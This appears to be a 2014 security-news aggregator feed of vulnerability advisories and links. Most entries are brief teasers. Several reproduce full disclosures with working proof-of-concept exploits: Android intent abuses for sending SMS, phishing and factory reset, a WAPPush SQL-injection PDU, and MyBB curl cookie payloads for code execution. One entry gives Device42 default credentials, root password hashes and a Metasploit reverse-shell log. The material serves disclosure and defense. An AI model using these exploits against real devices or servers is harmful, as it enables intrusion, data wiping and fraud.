Hard disk hacking - Intro

November 24, 2014, 1:55 pm

≫ Next: Google Chrome caused a kernel crash..!

≪ Previous: Craigslist's Netsol account was compromised, name servers changed

Hard disks: if you read this, it's pretty much certain you use one or more of the things. They're pretty simple: they basically present a bunch of 512-byte sectors, numbered by an increasing address, also known as the LBA or Logical Block Address. The PC the HD is connected to can read or write data to and from these sectors. Usually, a file system is used that abstracts all those sectors to files and folders.

more here........http://spritesmods.com/?art=hddhack&page=1

↧

Google Chrome caused a kernel crash..!

November 25, 2014, 2:31 am

≫ Next: Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2

≪ Previous: Hard disk hacking - Intro

Google Chrome caused a kernel crash here..........http://www.binarysniper.net/2014/11/google-chrome-caused-kernel-crash.html

↧

Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2

November 25, 2014, 2:33 am

≫ Next: Paper: Wait a minute! A fast, Cross-VM attack on AES

≪ Previous: Google Chrome caused a kernel crash..!

A year ago, @mubix published a cool post on http://carnal0wnage.attackresearch.com/ about “Dumping a domain’s worth of passwords with mimikatz“. In the article, he talked about using a combination of PowerShell, file shares, .bat scripts and output files in order to run Mimikatz across a large number of machines in an enterprise using just WMI.

A few months ago, @obscuresec posted a great article on using PowerShell as a quick and dirty web server. I started thinking about how to incorporate Chris’ work with Rob’s approach to simplify the attack flow a bit.

more here..........http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/

↧

Paper: Wait a minute! A fast, Cross-VM attack on AES

November 25, 2014, 2:35 am

≫ Next: Stupid is as Stupid Does When It Comes to .NET Remoting

≪ Previous: Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2

In cloud computing, efficiencies are reaped by resource shar-
ing such as co-location of computation and deduplication of data. This
work exploits resource sharing in virtualization software to build a pow-
erful cache-based attack on AES. We demonstrate the vulnerability by
mounting Cross-VM Flush+Reload cache attacks in VMware VMs to
recover the keys of an AES implementation of OpenSSL 1.0.1 running
inside the victim VM. Furthermore, the attack works in a realistic setting
where different VMs are located on separate cores. The modified
flush+reload attack we present, takes only in the order of seconds to min-
utes to succeed in a cross-VM setting. Therefore long term co-location, as
required by other fine grain attacks in the literature, are not needed. The
results of this study show that there is a great security risk to OpenSSL
AES implementation running on VMware cloud services when the dedu-
plication is not disabled

more here..........http://eprint.iacr.org/2014/435.pdf

↧

Stupid is as Stupid Does When It Comes to .NET Remoting

November 25, 2014, 3:58 am

≫ Next: GemFire: From OQLi to RCE through reflection

≪ Previous: Paper: Wait a minute! A fast, Cross-VM attack on AES

Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

more here.........http://tyranidslair.blogspot.co.uk/2014/11/stupid-is-as-stupid-does-when-it-comes.html

↧

GemFire: From OQLi to RCE through reflection

November 25, 2014, 1:48 pm

≫ Next: Burp CO2 now sports some Laudanum Scripts!

≪ Previous: Stupid is as Stupid Does When It Comes to .NET Remoting

During a penetration testing activity on one of our customers, we had to assess the security of some web services that interacted with an underlying GemFire database.

more here.........http://blog.emaze.net/2014/11/gemfire-from-oqli-to-rce-through.html

↧

Burp CO2 now sports some Laudanum Scripts!

November 26, 2014, 12:43 am

≫ Next: CVE-2014-8610 Android < 5.0 SMS resend vulnerability

≪ Previous: GemFire: From OQLi to RCE through reflection

There have been a number of updates to the Burp CO2 extension suite over the past couple of months but the most exciting one is the addition of Laudanum functionality. The Laudanum Project consists of a set of exploit scripts that are useful during penetration tests when the tester encounters the ability to upload files somewhere in the web root of an application server.

more here........http://blog.secureideas.com/2014/11/burp-co2-now-sports-some-laudanum.html

↧

CVE-2014-8610 Android < 5.0 SMS resend vulnerability

November 26, 2014, 4:12 am

≫ Next: CVE-2014-8609 Android Settings application privilege leakage vulnerability

≪ Previous: Burp CO2 now sports some Laudanum Scripts!

INTRODUCTION
==================================
In Android <5.0, an unprivileged app can resend all the SMS stored in the user's phone to their corresponding recipients or senders (without user interaction).
No matter whether these SMS are sent to or received from other people. This may leads to undesired cost to user.
Even the worse, since Android also allow unprivileged app to create draft SMS, combined with this trick, bad app can send any SMS without privilege requirement.

DETAILS
==================================
This vulnerability exists in the following source file of the Mms app:
https://android.googlesource.com/platform/packages/apps/Mms/+/android-4.4.4_r2.0.1/src/com/android/mms/transaction/SmsReceiverService.java
If bad app broadcast an intent with action "com.android.mms.transaction.MESSAGE_SENT", it will reach the method "handleSmsSent". If the bad app can also control the resultcode to be RESULT_ERROR_RADIO_OFF, then it will reach the following conditional branch, there the SMS (determined by uri ) will be moved to a queue to be resent:

private void handleSmsSent(Intent intent, int error) {
...
} else if ((mResultCode == SmsManager.RESULT_ERROR_RADIO_OFF) || (mResultCode == SmsManager.RESULT_ERROR_NO_SERVICE)) {
if (Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) {
Log.v(TAG, "handleSmsSent: no service, queuing message w/ uri: " + uri);
}
// We got an error with no service or no radio. Register for state changes so
// when the status of the connection/radio changes, we can try to send the
// queued up messages.
registerForServiceStateChanges();
// We couldn't send the message, put in the queue to retry later.
Sms.moveMessageToFolder(this, uri, Sms.MESSAGE_TYPE_QUEUED, error);
...

The POC code is as follows:

Intent intent= new Intent("com.android.mms.transaction.MESSAGE_SENT");
intent.setData(Uri.parse("content://sms"));
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");
sendOrderedBroadcast(intent,null,null,null,SmsManager.RESULT_ERROR_RADIO_OFF,null,null);

Some tips about the POC:
1. uri is content://sms without specifying the ID, that means all the SMS will be resent.
2. must use explicit intent
3. with this version of sendOrderedBroadcast, the initial result code can be controlled

Normally, once the SMS is moved to the queue, it will be sent automatically!

But can we craft any SMS message? here is a trick:

Currently, any app can create a draft SMS without permission by a code snippet as follows:

Intent intent1 = new Intent("android.intent.action.SENDTO");
intent1.setData(Uri.parse("smsto:yourphonenumber"));
intent1.putExtra("sms_body", "another test sms1!");
startActivity(intent1);

After send the above intent, the app can wait for a short time then start another activity, this will cause ComposeMessageActivity in MMS app to call method onStop(), which will save the draft into database, which can be resent later. Thus we can craft any SMS message without permission requirement.

This has been fixed in android 5.0 (android bug id 17671795)
https://android.googlesource.com/platform/packages/apps/Mms/+/008d6202fca4002a7dfe333f22377faa73585c67

TIMELINE
==================================
26.09.2014 Initial report to Android Security Team with the POC
27.09.2014 Reply from Android Security Team "are looking into it"
30.09.2014 Find app can create draft and notify Android Security Team with a updated POC
02.10.2014 Reply from Android Security Team "We will fix this issue in the next major release"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8610 assigned
25.11.2014 Got Permission from Android Security Team to publish this
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8610
Android id 17671795

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=164

↧

CVE-2014-8609 Android Settings application privilege leakage vulnerability

November 26, 2014, 4:13 am

≫ Next: Typos Can have a Bigger Impact Than Expected

≪ Previous: CVE-2014-8610 Android < 5.0 SMS resend vulnerability

INTRODUCTION
==================================
In Android <5.0 (and maybe >= 4.0), Settings application leaks Pendingintent with a blank base intent (neither the component nor the action is explicitly set) to third party application, bad app can use this to broadcast intent with the same permissions and identity of the Settings application, which runs as SYSTEM uid. Thus bad app can broadcast sensitive intent with the permission of SYSTEM.

DETAILS
==================================
The vulnerability exists in the AddAccountSettings.java in the Settings app:
https://android.googlesource.com/platform/packages/apps/Settings/+/android-4.4.4_r2.0.1/src/com/android/settings/accounts/AddAccountSettings.java

In the method addAccount, a PendingIntent is created by getBroadcast, the problem here is both the action and the component are not explicitly set:

private void addAccount(String accountType) {
Bundle addAccountOptions = new Bundle();
mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);
addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this));
AccountManager.get(this).addAccount(
accountType,
null, /* authTokenType */
null, /* requiredFeatures */
addAccountOptions,
null,
mCallback,
null /* handler */);
mAddAccountCalled = true;
}

This PendingIntent is then stored in the addAccountOptions, which will be sent to another application.

According to android developer guides, this is not secure: (see http://developer.android.com/reference/android/app/PendingIntent.html)
"By giving a PendingIntent to another application, you are granting it the right to perform the operation you have specified as if the other application was yourself (with the same permissions and identity). As such, you should be careful about how you build the PendingIntent: almost always, for example, the base Intent you supply should have the component name explicitly set to one of your own components, to ensure it is ultimately sent there and nowhere else."

The bad app can register as an account authenticator by writing a service with the following intent filter (no permission is needed):

<intent-filter>
<action android:name="android.accounts.AccountAuthenticator" />
</intent-filter>

Then bad app can send an intent to Settings app and request Settings app to add account of requested account type:

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.settings","com.android.settings.accounts.AddAccountSettings"));
intent.setAction(Intent.ACTION_RUN);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
String authTypes[] = {AccountGeneral.ACCOUNT_TYPE};

intent.putExtra("account_types", authTypes);
startActivity(intent);

Upon receiving such an intent, Settings app will (automatically) call the method addAccount (whose vulnerability is explained as above) and sent the pendingIntent to bad app's addAccount method.

Since the pendingIntent's actions and components are blank, bad app can fillin arbitrary action and extra information into this intent and resending this pending intent, with the permission of SYSTEM.

For example, bad app can create a phishing SMS in the phone with the following POC:

public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
...
PendingIntent pendingIntent = (PendingIntent)options.getParcelable("pendingIntent");
Intent newIntent = new Intent();
newIntent.setAction("android.provider.Telephony.SMS_RECEIVED");
//filling phishing sms pdu data
newIntent.putExtra( "pdus" , new Object[] { pdu });
newIntent.putExtra("format", "3gpp");
try {
pendingIntent.send(mContext, 0, newIntent, null, null);
} catch (CanceledException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}

Or force the phone to factory reset to delete user's data with the following POC:

public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
PendingIntent test = (PendingIntent)options.getParcelable("pendingIntent");
Intent newIntent2 = new Intent("android.intent.action.MASTER_CLEAR");
try {
test.send(mContext, 0, newIntent2, null, null);
} catch (CanceledException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}

This has been fixed in android 5.0 (android bug id 17356824)
https://android.googlesource.com/platform/packages/apps/Settings/+/f5d3e74ecc2b973941d8adbe40c6b23094b5abb7

TIMELINE
==================================
02.09.2014 Initial report to Android Security Team with the phishing SMS POC
03.09.2014 Reply from Android Security Team "opened an internal inquiry about this"
09.09.2014 Find a new factory reset POC and notify Android Security Team
10.09.2014 Reply from Android Security Team "We do acknowledge the issue"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8609 assigned
25.11.2014 Got Permission from Android Security Team to publish this
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8609
Android id 17356824

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=158

↧

Typos Can have a Bigger Impact Than Expected

November 26, 2014, 4:14 am

≫ Next: CVE-2014-8507 Android < 5.0 SQL injection vulnerability in WAPPushManager

≪ Previous: CVE-2014-8609 Android Settings application privilege leakage vulnerability

Have you ever thought about the cost of a typo? You know what I mean, a simple misspelling of a word somewhere on your website. Do you think there’s a risk in that?

You may have seen the Grammar Police all over your comments yelling that you used the wrong version of “your” and pointing out how stupid you are, right? Unfortunately, that’s the internet. But what if you have misspelled something that your readers can’t see right away?

more here.........http://blog.sucuri.net/2014/11/typos-can-have-a-bigger-impact-than-expected.html

↧

CVE-2014-8507 Android < 5.0 SQL injection vulnerability in WAPPushManager

November 26, 2014, 4:15 am

≫ Next: Infected HTML Files Bundled in Android Apps

≪ Previous: Typos Can have a Bigger Impact Than Expected

INTRODUCTION
==================================
In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check)

DETAILS
==================================
When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java

Here the pdu is parsed to get the contentType & wapAppId:

String mimeType = pduDecoder.getValueString();
...
/**
* Seek for application ID field in WSP header.
* If application ID is found, WapPushManager substitute the message
* processing. Since WapPushManager is optional module, if WapPushManager
* is not found, legacy message processing will be continued.
*/
if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
index = (int) pduDecoder.getValue32();
pduDecoder.decodeXWapApplicationId(index);
String wapAppId = pduDecoder.getValueString();
if (wapAppId == null) {
wapAppId = Integer.toString((int) pduDecoder.getValue32());
}
String contentType = ((mimeType == null) ?
Long.toString(binaryContentType) : mimeType);
if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);

The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console

Type the following command in telnet console:

sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001

And watch the radio logcat message in emulator, it prints out the extracted malicious appid:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"

But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage:

try {
boolean processFurther = true;
IWapPushManager wapPushMan = mWapPushManager;
if (wapPushMan == null) {
if (DBG) Rlog.w(TAG, "wap push manager not found!");
} else {
Intent intent = new Intent();
intent.putExtra("transactionId", transactionId);
intent.putExtra("pduType", pduType);
intent.putExtra("header", header);
intent.putExtra("data", intentData);
intent.putExtra("contentTypeParameters",
pduDecoder.getContentParameters());
int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);

So we go on checking the source code of WAPPushManager:

https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/

In the method processMessage, the app_id and content_type is used in the method queryLastApp:

public int processMessage(String app_id, String content_type, Intent intent)
throws RemoteException {
Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
WapPushManDBHelper dbh = getDatabase(mContext);
SQLiteDatabase db = dbh.getReadableDatabase();
WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
db.close();

Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input,

protected queryData queryLastApp(SQLiteDatabase db,
String app_id, String content_type) {
String sql = "select install_order, package_name, class_name, "
+ " app_type, need_signature, further_processing"
+ " from " + APPID_TABLE_NAME
+ " where x_wap_application=\'" + app_id + "\'"
+ " and content_type=\'" + content_type + "\'"
+ " order by install_order desc";
if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
Cursor cur = db.rawQuery(sql, null);

Obviously, this is a SQL injection, for example, if app_id is as follows:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

Then the package_name & class_name of query result would be:
"com.android.settings" and "com.android.settings.Setttings"

OK, then we return back to the method processMessage of WAPPushManager
The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service
That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check)

if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
//Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(lastapp.packageName, lastapp.className);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
try {
mContext.startActivity(intent);
} catch (ActivityNotFoundException e) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
} else {
intent.setClassName(mContext, lastapp.className);
intent.setComponent(new ComponentName(lastapp.packageName,
lastapp.className));
if (mContext.startService(intent) == null) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
}

This has been fixed in android 5.0 (android bug id 17969135)
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6

TIMELINE
==================================
11.10.2014 Initial report to Android Security Team with the POC
14.10.2014 Reply from Android Security Team "are looking into it"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
09.11.2014 Contact MITRE about this issue
17.11.2014 CVE-2014-8507 assigned
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8507
Android id 17969135

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=167

↧

Infected HTML Files Bundled in Android Apps

November 26, 2014, 4:16 am

≫ Next: device42 DCIM authenticated remote root via appliance manager

≪ Previous: CVE-2014-8507 Android < 5.0 SQL injection vulnerability in WAPPushManager

Computer malware can have a long arms reach, given the right environment. In today’s computing age there are more platforms for malware to crossover and spread, easily latching on to their favorite file hosts.

Recently, we came across some Android apps infected with the VBS file infector Ramnit residing in Google’s Play Store.

more here..........https://blog.malwarebytes.org/mobile-2/2014/11/infected-html-files-bundled-in-android-apps/

↧

device42 DCIM authenticated remote root via appliance manager

November 26, 2014, 4:17 am

≫ Next: ModSecurity Advanced Topic of the Week: Detecting Malware with Fuzzy Hashing

≪ Previous: Infected HTML Files Bundled in Android Apps

Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0

http://www.device42.com/download/

Device42 ships virtual appliances ready for production use as a trial
(essentially dictated by the license provided).

The Appliance Manager listens on HTTP (no SSL) on port 4242 with default
credentials of d42admin:default.

Within the Appliance Manager, the Ping and Traceroute utilities are
susceptible to command injection via bash metacharacters. The user which
the commands get executed under is the 'ubuntu' user, but this user has
passwordless sudo ability, so it is essentially root access. Two exploits
are provided that exploit these vulnerabilities using the default
credentials.

Updates from device42 are encrypted by default to prevent users from
creating their own updates and uploading them, but the password for the
encrypted zip file is 'pass:zofo8REgqM' so any user could create their own
encrypted update using this passphrase.

openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/update.zip -pass
pass:zofo8REgqM

Also, the root and ubuntu users have default passwords in the shadow file.

Root –
$6$zhdissWh$2VrhU3tncXClbuUU3dJk2ieAKF3kTPpvcT9/VKw.Yw4rl1E2eYpAYAfZUgSZvYhqVQvUqLVRp8HOsoMueKgd10

Ubuntu –
$6$1eU5n9o7$w4.tmNriNT1Zb5HabWwlGmnmy8ij1fKbn0UGf9raHKdIaurYVD/ZU9C2s6DBueKhVbekZCozzAoHZH43.OwDi/

msf exploit(device42_tracert_exec) > show options

Module options (exploit/linux/http/device42_tracert_exec):

Name Current Setting Required Description

---- --------------- -------- -----------

Proxies no Use a proxy chain

RHOST 192.168.1.81 yes The target address

RPORT 4242 yes The target port

VHOST no HTTP server virtual host

Payload options (cmd/unix/reverse):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.1.31 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(device42_tracert_exec) > exploit

[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo YWFxSIuVtNUMShSi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket A

[*] A: "YWFxSIuVtNUMShSi\r\n"

[*] Matching...

[*] B is input...

[*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.81:39878)
at 2014-11-22 17:36:59 -0600

sudo su

id

uid=0(root) gid=0(root) groups=0(root)

exit

id

uid=1000(ubuntu) gid=1000(ubuntu)
groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare)

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

↧

ModSecurity Advanced Topic of the Week: Detecting Malware with Fuzzy Hashing

November 26, 2014, 4:18 am

≫ Next: phpBB

≪ Previous: device42 DCIM authenticated remote root via appliance manager

In the most recent release of ModSecurity v2.9.0-RC1, we introduced a new operator called @fuzzyHash which uses functionality from the ssdeep tool. This blog post will demonstrate a powerful use-case with ModSecurity which is identifying malware in web attachment uploads.

more here.........http://blog.spiderlabs.com/2014/11/modsecurity-advanced-topic-of-the-week-detecting-malware-with-fuzzy-hashing.html

↧

phpBB

November 26, 2014, 4:19 am

≫ Next: MyBB

≪ Previous: ModSecurity Advanced Topic of the Week: Detecting Malware with Fuzzy Hashing

When PHP's register_globals configuration directive set on, phpBB will call
deregister_globals() function, all global variables registered by PHP will
be destroyed. But deregister_globals() functions can be bypassed.

```
$input = array_merge(
array_keys($_GET),
array_keys($_POST),
array_keys($_COOKIE),
array_keys($_SERVER),
array_keys($_SESSION),
array_keys($_ENV),
array_keys($_FILES)
);

foreach ($input as $varname)
{
if (isset($not_unset[$varname]))
{
if ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) ||
isset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) ||
isset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) ||
isset($_FILES['GLOBALS']))
{
exit;
}
else
{
$cookie = &$_COOKIE;
while (isset($cookie['GLOBALS']))
{
if (!is_array($cookie['GLOBALS']))
{
break;
}
....
}
}
unset($GLOBALS[$varname]);
}
```

In the above code we see, when request $_COOKIE['GLOBALS'] = 1,
$GLOBALS['GLOBALS'] will be destroyed by unset(). This means $GLOBALS array
will be destroyed. This also means you will not be able to use
$GLOBALS['key'] to access or control a global variable in all scopes
throughout a script. Because the binding between the $GLOBALS array and the
global symbol table has been broken. All global variables registered by PHP
form $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will be not
unregistered.

Proof of Concept

```
$_COOKIE['GLOBALS'] = 1;
$_COOKIE['ryat'] = $ryat = 'ryat';

deregister_globals();

var_dump($GLOBALS);
var_dump($ryat);

$GLOBALS['ryat'] = 'hi';

var_dump($GLOBALS);
var_dump($ryat);
```

P.S. I had reported the issue to the phpBB developers, but they do not
consider this a security issue.

Authored byTaoguang Chen
taoguangchen@gmail.com

↧

MyBB

November 26, 2014, 4:20 am

≫ Next: CITAS – Computer Intrusion Threat Assessment System

≪ Previous: phpBB

#MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code
Execution Vulnerability

Taoguang Chen <[@chtg57](twitter.com/chtg57)> - 2014.11.21

> MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution.

##I. MyBB's unset_globals() Function Bypass

When PHP's register\_globals configuration set on, MyBB will call
unset\_globals() function, all global variables registered by PHP from
$\_POST, $\_GET, $\_FILES, and $\_COOKIE arrays will be destroyed.

```
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}

foreach(array_keys($array) as $key)
{
unset($GLOBALS[$key]);
unset($GLOBALS[$key]); // Double unset to circumvent the
zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
}
}
```

But unset\_globals() function can be bypassed.

###i) $\_GET, $\_FILES, or $\_COOKIE Array was Destroyed

```
foo.php?_COOKIE=1
// $_GET['_COOKIE']
```

When $_GET['\_COOKIE']=1 is sent, unset\_globals() will destroy
$GLOBALS['\_COOKIE'].

```
$this->unset_globals($_GET);
...
}
...
function unset_globals($array)
{
...
foreach(array_keys($array) as $key)
{
unset($GLOBALS[$key]);
```

This means $\_COOKIE array will be destroyed. This also means all
global variables registered by PHP from $\_COOKIE array will be
destroyed because them will not be handled by unset().

```
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
```

By the same token, if $\_GET or $\_FILES array was destroyed via
unset\_globals(), the corresponding global variables registered by PHP
will not be destroyed.

###ii) $GLOBALS Array was Destroyed

```
foo.php?GLOBALS=1
// $_GET['GLOBALS']
```

When $\_GET['GLOBALS']=1 is sent, unset\_globals() will destroy
$GLOBALS['GLOBALS']. This means $GLOBALS array will be destroyed.

$GLOBALS array is a automatic global variable, and binding with global
symbol table, you can use $GLOBALS['key'] to access or control a
global variable in all scopes throughout a script. This means that the
binding between the $GLOBALS array and the global symbol table will be
broken because $GLOBALS array has been destroyed. This also means all
variables registered by PHP from $\_GET, $\_FILES and $\_COOKIE arrays
will not be destroyed.

By the same token, when $\_POST['GLOBALS'], $\_FLIES['GLOBALS'], or
$\_COOKIE['GLOBALS'] is sent, unset\_globals() will destroy $GLOBALS
array, then the corresponding global variables registered by PHP will
not be destroyed.

In fact, MyBB is already aware of the problem:

```
$protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES",
"_ENV", "GLOBALS");
foreach($protected as $var)
{
if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
{
die("Hacking attempt");
}
}
```

Unfortunately, there is a small hole yet:-)

$\_REQUEST is an associative array that by default contains mix of
$\_GET, $\_POST, and $\_COOKIE arrays data.

But PHP >= 5.3 introduced request\_order configuration, the directive
affects the contents of $\_REQUEST array.

```
request_order = "GP"
```

This is recommended setting in php.ini. Set it to "GP" means only
$\_GET and $\_POST arrays data is merged into $\_REQUEST array without
$\_COOKIE array data.

So, it is possible that sent $\_COOKIE['GLOBALS'], then bypass
unset\_globals() function in PHP 5.3.

##II. Remote Code Execution Vulnerability

There is one interesting method in MyBB:

```
class MyBB {
...
function __destruct()
{
// Run shutdown function
if(function_exists("run_shutdown"))
{
run_shutdown();
}
}
}
```

Look into run\_shutdown() function:

```
function run_shutdown()
{
global $config, $db, $cache, $plugins, $error_handler,
$shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
...
// Run any shutdown functions if we have them
if(is_array($shutdown_functions))
{
foreach($shutdown_functions as $function)
{
call_user_func_array($function['function'], $function['arguments']);
}
}

$done_shutdown = true;
}
```

The $shutdown\_functions was initialized via add\_shutdown() function
in init.php:

```
// Set up any shutdown functions we need to run globally
add_shutdown('send_mail_queue');
```

But add\_shutdown() function initialization handler is wrong:

```
function add_shutdown($name, $arguments=array())
{
global $shutdown_functions;

if(!is_array($shutdown_functions))
{
$shutdown_functions = array();
}

if(!is_array($arguments))
{
$arguments = array($arguments);
}

if(is_array($name) && method_exists($name[0], $name[1]))
{
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
return true;
}
else if(!is_array($name) && function_exists($name))
{
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
return true;
}

return false;
}
```

In the above code we see that run\_shutdown() function is vulnerable
because $shutdown\_functions is initialized correctly and therefore
result in arbitrary code execution.

##III. Proof of Concept

When request\_order = "GP" and register\_globals = On, remote code
execution by just using curl on the command line:

```
$ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo;
shutdown_functions[0][arguments][]=-1" http://www.target/
```

##IV. P.S.I

**Another case to exploit the vulnerability:**

When PHP's "disable\_functions" configuration directive disable
ini\_get() function:

```
disable_functions = ini_get
```

The unset\_globals() function will not be called that regardless of
register\_globals set on or off.

```
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
```

**Proof of Concept**

Works on disable\_functions = ini\_get and register\_globals = On:

```
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
```

##V. P.S.II

**SQL injection vulnerability via run\_shutdown() function**

```
function run_shutdown()
{
global $config, $db, $cache, $plugins, $error_handler,
$shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
...
// We have some shutdown queries needing to be run
if(is_array($shutdown_queries))
{
// Loop through and run them all
foreach($shutdown_queries as $query)
{
$db->query($query);
}
}
```

The $shutdown\_queries was initialized in global.php:

```
$shutdown_queries = array();
```

But not all files are included global.php, such as css.php:

```
require_once "./inc/init.php";
```

There is not included global.php, and $shutdown\_queries is
uninitialized, with the result that there is a SQL injection
vulnerability.

**Proof of Concept**

Works on request\_order = "GP" and register\_globals = On:

```
$ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj"
http://www.target/css.php
```

Works on disable\_functions = ini\_get and register\_globals = On:

```
css.php?shutdown_queries[]=SQL_Inj
```

##VI. Disclosure Timeline

* 2014.03.06 - Notified the MyBB devs via security contact form
* 2014.11.16 - Renotified the MyBB devs via Private Inquiries forum
because no reply
* 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16
* 2014.11.21 - Public Disclosure

↧

CITAS – Computer Intrusion Threat Assessment System

November 26, 2014, 4:22 am

≫ Next: Paper: Erlang Security 101

≪ Previous: MyBB

Last weekend, I was at a small conference and one of the people whose presentations I attended was an FBI special agent named John B. Chesson.

